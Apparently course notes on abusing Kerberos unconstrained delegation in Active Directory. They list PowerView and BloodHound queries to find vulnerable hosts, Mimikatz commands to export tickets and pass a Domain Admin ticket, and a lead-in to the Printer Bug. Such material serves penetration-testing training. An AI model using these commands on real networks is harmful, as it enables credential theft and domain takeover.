- When set for a particular service account, unconstrained delegation
allows delegation to any service to any resource on the domain as a
user.
- When unconstrained delegation is enabled, the DC places user's TGT
inside TGS (Step 4 in the previous diagram). When presented to the
server with unconstrained delegation, the TGT is extracted from TGS
and stored in LSASS. This way the server can reuse the user's TGT to
access any other resource as the user.
- This could be used to escalate privileges in case we can compromise the
computer with unconstrained delegation and a Domain Admin connects
to that machine.
Discover domain computers which have unconstrained delegation
enabled using PowerView:
Get-DomainComputer -Unconstrained | select name, samaccountname

Bloodhound
MATCH (c:Computer {unconstraineddelegation:true}) return c

- Compromise the server(s) where Unconstrained delegation is enabled.
- We must trick or wait for a domain admin to connect a service on appsrv.
- Now, if the command is run again:
Invoke-Mimikatz –Command '"sekurlsa::tickets /export"'
- The DA token could be reused:
Invoke-Mimikatz -Command '"kerberos::ptt C:\Users\appadmin\Documents\user1\[0;2ceb8b3]-2-0- [email protected]"'
Unconstrained Delegation - Printer Bug
- How do we trick a high privilege user to connect to a machine with Unconstrained Delegation? The Printer Bug!